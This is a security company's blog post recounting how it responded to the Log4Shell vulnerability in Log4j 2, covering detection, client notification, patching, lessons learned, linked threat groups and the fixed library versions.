How Reliance acsn responded to the Log4J issue

As we reach the end of a year of enormous advances on both sides of the cyber security ‘arms race’, we thought we would share how Reliance acsn responded to the Log4J issue that has dominated the industry for almost two weeks now.

What is Log4Shell?

It’s hard to image that anyone in the IT industry hasn’t (probably unwillingly) become an overnight expert in obscure logging libraries, but in brief the news surrounded the widespread publication of a zero-day vulnerability that had left systems exposed for several weeks.  An Apache library named ‘Log4J 2’ – a logging framework used in numerous enterprise platforms – was vulnerable to a remote code execution attack.  If an application containing the framework logged non-sanitised input from a user, an attacker could inject code in the logs which would then execute on the vulnerable server.  They could use this to open a C2 channel, for example.  This initial vulnerability gave rise to some related CVEs, which are listed at the end of the blog post.

What issues did Reliance acsn encounter?

Our two core managed service offering are MSS – managing security devices on behalf of our clients – and MDR – detecting and responding to incidents.  Our client base is both numerous and diverse and as a result we either support or monitor thousands of different devices, servers, services and applications.  Our clients wanted to know three key things:

1 “Are we vulnerable to this – and if so – have we been successfully targeted?“
2 “Is anything that Reliance acsn have deployed vulnerable to this?  Has anything that you’ve deployed been affected?”
3 “If we are vulnerable, what do we do about it?”

Fortunately, the community was quick to respond with some great information.  That included IOCs, known malicious domains/IPs, hotfixes, patches, recursive scanners and more.  The challenge became distilling the enormous volume of information into actionable intelligence for our clients.

How did Reliance acsn respond?

The news broke fully on 10th December 2021.  By the following day we’d notified our clients, added new rules and IOCs to our SIEM platforms, ingested additional (credible) threat intelligence, and set about answering the questions above.  With the right granularity of logs from affected servers, we could determine with some confidence whether a client had been successfully targeted – these became our priority cases for investigation and remediation.  Sadly, we found some issues.  Next we set about identifying any unsuccessful attempts that had been made, or the presence of any vulnerable platforms – whilst continuously ingesting intelligence to enrich our detection capacity.  Our clients received tailored information and detailed bespoke reports illustrating how they can find and fix any issues.

Our MSS engineers added additional profiles and rules to deployed security devices to protect critical client infrastructure, whilst ensuring that our fielded technologies were appropriately protected.   The trick was to stay on top of advisories from vendors and ensure any new IPS/IDS signatures were included, and that our security devices had the right visibility to detect issues.  We then of course had to look just as hard at our own environment to determine if we were vulnerable.  Thankfully only a small handful of services were vulnerable, and these were carefully segmented from each other and the wider internet – so no chance of compromise.  Nevertheless, they had to be quickly patched!

What are some lessons learned?

One of the key issues was just how long it took some of our larger clients to identify the presence of the affected framework in their estates.  It really showed the value of central management consoles and routine vulnerability scanning.  If this isn’t done, the next CRITICAL vulnerability will carry the same problem for our clients; how can we patch it if we don’t know where to find it?    Next – a technical point – but most firewalls have means of inspecting encrypted traffic if correctly configured (SSL inspection).  If this isn’t enabled, our IPS/IDS profiles don’t work as well, since they can’t see the key part of each data packet.  And finally, security teams must be willing to take risk in applying patches quickly..  A server performing a critical function is a reason to patch it quickly, not a reason not to.

Crucially, for as long as critical servers face the internet with multiple software dependencies, issues like this will re-occur.  Adherence to a robust compliance standard will ensure that many of the foundations (vulnerability scanning, asset registers, IR plans etc) are in place and ready to be mobilised in response.

What threats are associated with the Log4Shell?

One of the most prominent and advanced ransomware groups – Conti, have been weaponizing this vulnerability. In addition, Khonsari and Tellyouthepass have also been reported using Log4Shell to their advantage.  Iranian and Chinese nation state threat actors have been observed weaponizing Log4Shell in the wild. Reliance acsn have been actively tracking the above threats on the strategic, operational and the tactical level to ensure all of the newest techniques are being detected in our MDR service.

CVEs and patching:

Organizations should upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later) or apply other workarounds order to mitigate the three associated CVEs – CVE-2021-44228, CVE-2021-45046 and the CVE-2021-45105.